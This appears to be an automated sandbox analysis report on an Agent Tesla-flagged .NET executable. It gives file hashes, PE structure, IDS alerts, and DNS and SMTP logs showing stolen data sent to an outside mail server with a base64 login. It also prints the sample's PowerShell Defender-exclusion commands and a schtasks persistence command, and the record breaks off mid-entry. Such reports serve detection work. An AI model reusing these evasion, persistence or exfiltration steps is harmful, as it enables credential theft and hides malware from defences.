                            Process:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                            File Type:XML 1.0 document, ASCII text
                            Category:dropped
                            Size (bytes):1580
                            Entropy (8bit):5.116484496204205
                            Encrypted:false
                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaHxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTcv
                            MD5:1AC293B57893D7F15FEC2D62F2B81B15
                            SHA1:7D73A01CDEBDC72F08EF5001BE928CADFAE17FF7
                            SHA-256:7F4C202C63938CB22EED8ABDC026F2AE89379086669AFCE07C713A74331736C8
                            SHA-512:92BF0B98B56A2C92C493F33CD6478901E25E78411AE816D941467F30139941ABD96DFA3D7787580BD445ACEC7679F4DF09341F8DB3ED183A7FA9AF3FBF9F5B2E
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                            Process:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):685063
                            Entropy (8bit):7.60396683966757
                            Encrypted:false
                            SSDEEP:12288:RkXayww0J7RG6YnakFrTtJ7IomjXXIR+w8/6ODi6dU3bAil+8I4:WajBtN+aOrTtJ7IZ4EwQh1d9iot
                            MD5:2C10CB6C2E23B7712EBF4042D669CD09
                            SHA1:F86ADB59BD065AFD9195B9375271096F341842DC
                            SHA-256:546569A42F00553D7FDA79E6961779AFADD95EA8E6A8738EF344275F2B642244
                            SHA-512:2AC43799B1C4169308CCAB675563897BC6D3A144EBDE4FD214D4BCE114A978576A5980CEC8909A37B12C912B86297645CC79F8E9BB0C21EA4ECDA409E3492ABA
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.................0..j..........f.... ........@.. ....................................@.....................................O....................................q..p............................................ ............... ..H............text....i... ...j.................. ..`.rsrc................l..............@..@.reloc...............r..............@..B................F.......H.......|e...C..........`...(............................................0.............?......?...%.n...(.......?...%.r...(.......?...%.p...(.......?...%.o...(........?...%.q...(...............r...p(....-:..r...p(....-5..r...p(....-0..r...p(....-+..r...p(....-'+/.(...+.+&.(...+.+..(...+.+...(...+.+...(...+.+....+...*...0..,.......sg......}s........h...s....(...+..(...+.+..*.0..{........~)...o....}.....~*...}...........}.......?...}......}......}.....(.......(......(......(...
                            Process:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:true
                            Preview:[ZoneTransfer]....ZoneId=0
                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):7.60396683966757
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            • Win32 Executable (generic) a (10002005/4) 49.75%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Windows Screen Saver (13104/52) 0.07%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            File name:LisectAVT_2403002A_16.exe
                            File size:685'063 bytes
                            MD5:2c10cb6c2e23b7712ebf4042d669cd09
                            SHA1:f86adb59bd065afd9195b9375271096f341842dc
                            SHA256:546569a42f00553d7fda79e6961779afadd95ea8e6a8738ef344275f2b642244
                            SHA512:2ac43799b1c4169308ccab675563897bc6d3a144ebde4fd214d4bce114a978576a5980cec8909a37b12c912b86297645cc79f8e9bb0c21ea4ecda409e3492aba
                            SSDEEP:12288:RkXayww0J7RG6YnakFrTtJ7IomjXXIR+w8/6ODi6dU3bAil+8I4:WajBtN+aOrTtJ7IZ4EwQh1d9iot
                            TLSH:0AE412B2124D6725E6A827F5424AD17243B14D978464C24C8FCABCCF7979F80C61AEBF
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.................0..j..........f.... ........@.. ....................................@................................
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0x4a8966
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0xFEADA566 [Tue May 26 14:55:34 2105 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                            Instruction
                            jmp dword ptr [00402000h]
                            inc ecx
                            add cl, al
                            add bl, al
                            add dl, al
                            add al, al
                            add ah, al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [edi+00h], cl
                            rol dword ptr [eax], cl
                            aad 00h
                            aam 00h
                            rol byte ptr [eax], cl
                            salc
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx+00h], cl
                            int 00h
                            into
                            add ah, cl
                            add bh, cl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ebp+00h], dl
                            fiadd dword ptr [eax]
                            fild dword ptr [eax]
                            fld dword ptr [eax]
                            fadd qword ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            inc ebp
                            add cl, cl
                            add dl, cl
                            add al, cl
                            add bl, cl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa89120x4f.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x5ac.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0xa71880x70.text
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000xa69bc0xa6a0029c64714f527c3485fff68ff7c6bdb09False0.8639098251125281data7.613224313381159IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc0xaa0000x5ac0x600d0ad6e480a7c708cd40aef5d151ab94fFalse0.423828125data4.101457314667063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0xac0000xc0x2004ece1db0d5e59280e03abec53da7b154False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_VERSION0xaa0900x31cdata0.4371859296482412
                            RT_MANIFEST0xaa3bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                            DLLImport
                            mscoree.dll_CorExeMain
                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                            2024-07-25T23:35:36.103588+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973740.68.123.157192.168.2.4
                            2024-07-25T23:35:25.918768+0200TCP2855542ETPRO MALWARE Agent Tesla CnC Exfil Activity49735587192.168.2.4199.79.62.115
                            2024-07-25T23:35:29.982176+0200TCP2855542ETPRO MALWARE Agent Tesla CnC Exfil Activity49736587192.168.2.4199.79.62.115
                            2024-07-25T23:35:55.569991+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435320152.165.165.26192.168.2.4
                            2024-07-25T23:35:56.837685+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435320252.165.165.26192.168.2.4
                            2024-07-25T23:35:11.625146+0200TCP2840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249736587192.168.2.4199.79.62.115
                            • Total Packets: 35
                            • 587 undefined
                            • 53 (DNS)
                            TimestampSource PortDest PortSource IPDest IP
                            Jul 25, 2024 23:35:23.876939058 CEST49735587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:23.885090113 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:23.885191917 CEST49735587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:24.793643951 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:24.794495106 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:24.794589043 CEST49735587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:24.794698000 CEST49735587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:24.799479961 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:24.949985027 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:24.950963974 CEST49735587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:24.957315922 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:25.107184887 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:25.107641935 CEST49735587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:25.112927914 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:25.390507936 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:25.405983925 CEST49735587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:25.410924911 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:25.560883045 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:25.563057899 CEST49735587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:25.568017006 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:25.735280037 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:25.740468979 CEST49735587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:25.745935917 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:25.903961897 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:25.918486118 CEST49735587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:25.918767929 CEST49735587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:25.918808937 CEST49735587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:25.918808937 CEST49735587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:25.923645020 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:25.923719883 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:25.923729897 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:25.924105883 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:26.176848888 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:26.249310017 CEST49735587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:28.116808891 CEST49736587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:28.121876955 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:28.121990919 CEST49736587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:28.767617941 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:28.768058062 CEST49736587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:28.773082972 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:28.989729881 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:29.050421000 CEST49736587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:29.056140900 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:29.211951971 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:29.225052118 CEST49736587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:29.230014086 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:29.386955023 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:29.437552929 CEST49736587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:29.444000959 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:29.599245071 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:29.600358963 CEST49736587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:29.605863094 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:29.816788912 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:29.819538116 CEST49736587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:29.830068111 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:29.981301069 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:29.982088089 CEST49736587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:29.982176065 CEST49736587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:29.982202053 CEST49736587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:29.982223034 CEST49736587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:35:29.987366915 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:29.987396955 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:29.987410069 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:29.987416983 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:30.144319057 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:30.365951061 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:35:30.366024017 CEST49736587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:37:03.532053947 CEST49735587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:37:03.538991928 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:37:03.890084028 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:37:03.890256882 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:37:03.890357971 CEST49735587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:37:03.890574932 CEST49735587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:37:03.895457029 CEST58749735199.79.62.115192.168.2.4
                            Jul 25, 2024 23:37:08.235577106 CEST49736587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:37:08.240905046 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:37:08.598304033 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:37:08.598356962 CEST58749736199.79.62.115192.168.2.4
                            Jul 25, 2024 23:37:08.598412991 CEST49736587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:37:08.598515034 CEST49736587192.168.2.4199.79.62.115
                            Jul 25, 2024 23:37:08.603815079 CEST58749736199.79.62.115192.168.2.4
                            TimestampSource PortDest PortSource IPDest IP
                            Jul 25, 2024 23:35:23.504205942 CEST6008253192.168.2.41.1.1.1
                            Jul 25, 2024 23:35:23.823698997 CEST53600821.1.1.1192.168.2.4
                            Jul 25, 2024 23:35:50.618299961 CEST5364188162.159.36.2192.168.2.4
                            Jul 25, 2024 23:35:51.108766079 CEST5874053192.168.2.41.1.1.1
                            Jul 25, 2024 23:35:51.116590023 CEST53587401.1.1.1192.168.2.4
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jul 25, 2024 23:35:23.504205942 CEST192.168.2.41.1.1.10xae7Standard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                            Jul 25, 2024 23:35:51.108766079 CEST192.168.2.41.1.1.10x6928Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jul 25, 2024 23:35:23.823698997 CEST1.1.1.1192.168.2.40xae7No error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                            Jul 25, 2024 23:35:51.116590023 CEST1.1.1.1192.168.2.40x6928Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                            TimestampSource PortDest PortSource IPDest IPCommands
                            Jul 25, 2024 23:35:24.793643951 CEST58749735199.79.62.115192.168.2.4220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 03:05:24 +0530
                            220-We do not authorize the use of this system to transport unsolicited,
                            220 and/or bulk e-mail.
                            Jul 25, 2024 23:35:24.794495106 CEST58749735199.79.62.115192.168.2.4220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 03:05:24 +0530
                            220-We do not authorize the use of this system to transport unsolicited,
                            220 and/or bulk e-mail.
                            Jul 25, 2024 23:35:24.794698000 CEST49735587192.168.2.4199.79.62.115EHLO 226546
                            Jul 25, 2024 23:35:24.949985027 CEST58749735199.79.62.115192.168.2.4250-md-54.webhostbox.net Hello 226546 [8.46.123.33]
                            250-SIZE 52428800
                            250-8BITMIME
                            250-PIPELINING
                            250-PIPECONNECT
                            250-AUTH PLAIN LOGIN
                            250-STARTTLS
                            250 HELP
                            Jul 25, 2024 23:35:24.950963974 CEST49735587192.168.2.4199.79.62.115AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                            Jul 25, 2024 23:35:25.107184887 CEST58749735199.79.62.115192.168.2.4334 UGFzc3dvcmQ6
                            Jul 25, 2024 23:35:25.390507936 CEST58749735199.79.62.115192.168.2.4235 Authentication succeeded
                            Jul 25, 2024 23:35:25.405983925 CEST49735587192.168.2.4199.79.62.115MAIL FROM:<saless@mbarieservicesltd.com>
                            Jul 25, 2024 23:35:25.560883045 CEST58749735199.79.62.115192.168.2.4250 OK
                            Jul 25, 2024 23:35:25.563057899 CEST49735587192.168.2.4199.79.62.115RCPT TO:<iinfo@mbarieservicesltd.com>
                            Jul 25, 2024 23:35:25.735280037 CEST58749735199.79.62.115192.168.2.4250 Accepted
                            Jul 25, 2024 23:35:25.740468979 CEST49735587192.168.2.4199.79.62.115DATA
                            Jul 25, 2024 23:35:25.903961897 CEST58749735199.79.62.115192.168.2.4354 Enter message, ending with "." on a line by itself
                            Jul 25, 2024 23:35:25.918808937 CEST49735587192.168.2.4199.79.62.115.
                            Jul 25, 2024 23:35:26.176848888 CEST58749735199.79.62.115192.168.2.4250 OK id=1sX67R-003JwV-2e
                            Jul 25, 2024 23:35:28.767617941 CEST58749736199.79.62.115192.168.2.4220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 03:05:28 +0530
                            220-We do not authorize the use of this system to transport unsolicited,
                            220 and/or bulk e-mail.
                            Jul 25, 2024 23:35:28.768058062 CEST49736587192.168.2.4199.79.62.115EHLO 226546
                            Jul 25, 2024 23:35:28.989729881 CEST58749736199.79.62.115192.168.2.4250-md-54.webhostbox.net Hello 226546 [8.46.123.33]
                            250-SIZE 52428800
                            250-8BITMIME
                            250-PIPELINING
                            250-PIPECONNECT
                            250-AUTH PLAIN LOGIN
                            250-STARTTLS
                            250 HELP
                            Jul 25, 2024 23:35:29.050421000 CEST49736587192.168.2.4199.79.62.115AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                            Jul 25, 2024 23:35:29.211951971 CEST58749736199.79.62.115192.168.2.4334 UGFzc3dvcmQ6
                            Jul 25, 2024 23:35:29.386955023 CEST58749736199.79.62.115192.168.2.4235 Authentication succeeded
                            Jul 25, 2024 23:35:29.437552929 CEST49736587192.168.2.4199.79.62.115MAIL FROM:<saless@mbarieservicesltd.com>
                            Jul 25, 2024 23:35:29.599245071 CEST58749736199.79.62.115192.168.2.4250 OK
                            Jul 25, 2024 23:35:29.600358963 CEST49736587192.168.2.4199.79.62.115RCPT TO:<iinfo@mbarieservicesltd.com>
                            Jul 25, 2024 23:35:29.816788912 CEST58749736199.79.62.115192.168.2.4250 Accepted
                            Jul 25, 2024 23:35:29.819538116 CEST49736587192.168.2.4199.79.62.115DATA
                            Jul 25, 2024 23:35:29.981301069 CEST58749736199.79.62.115192.168.2.4354 Enter message, ending with "." on a line by itself
                            Jul 25, 2024 23:35:29.982223034 CEST49736587192.168.2.4199.79.62.115.
                            Jul 25, 2024 23:35:30.144319057 CEST58749736199.79.62.115192.168.2.4250 OK id=1sX67V-003Jyu-2t
                            Jul 25, 2024 23:35:30.365951061 CEST58749736199.79.62.115192.168.2.4250 OK id=1sX67V-003Jyu-2t
                            Jul 25, 2024 23:37:03.532053947 CEST49735587192.168.2.4199.79.62.115QUIT
                            Jul 25, 2024 23:37:03.890084028 CEST58749735199.79.62.115192.168.2.4221 md-54.webhostbox.net closing connection
                            Jul 25, 2024 23:37:08.235577106 CEST49736587192.168.2.4199.79.62.115QUIT
                            Jul 25, 2024 23:37:08.598304033 CEST58749736199.79.62.115192.168.2.4221 md-54.webhostbox.net closing connection
                            Target ID:0
                            Start time:17:35:15
                            Start date:25/07/2024
                            Path:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                            Imagebase:0xb30000
                            File size:685'063 bytes
                            MD5 hash:2C10CB6C2E23B7712EBF4042D669CD09
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:17:35:18
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                            Imagebase:0xe20000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:3
                            Start time:17:35:18
                            Start date:25/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            Target ID:4
                            Start time:17:35:18
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                            Imagebase:0xe20000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:17:35:18
                            Start date:25/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            Target ID:6
                            Start time:17:35:18
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp"
                            Imagebase:0x6a0000
                            File size:187'904 bytes
                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:7
                            Start time:17:35:19
                            Start date:25/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            Target ID:8
                            Start time:17:35:19
                            Start date:25/07/2024
                            Path:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                            Imagebase:0x2b0000
                            File size:685'063 bytes
                            MD5 hash:2C10CB6C2E23B7712EBF4042D669CD09
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:9
                            Start time:17:35:19
